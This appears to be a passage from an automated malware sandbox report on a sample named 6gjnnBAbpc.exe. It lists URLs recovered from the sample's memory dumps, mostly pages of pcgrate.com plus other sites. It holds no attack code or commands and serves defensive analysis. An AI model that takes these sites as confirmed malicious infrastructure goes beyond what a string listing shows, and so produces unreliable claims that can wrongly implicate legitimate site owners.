                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.536096257.0000000008D5B000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520195564.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541499970.0000000008D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/bg.png)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520195564.0000000005C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/error_board.png)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520195564.0000000005C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520195564.0000000005C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520195564.0000000005C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313030097.000000000A4D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.naoi-a.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307688121.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.306509483.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.419265077.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421450245.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307056613.00000000051A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olras.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ora-ito.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.536096257.0000000008D5B000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.539003729.0000000008D5C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ottospm.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ozs.si/o-zbornici
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#author
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#logo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#organization
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#richSnippet
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#webpage
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#website
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/?s=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/cart/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/checkout/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/comments/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-admin/admin-ajax.php
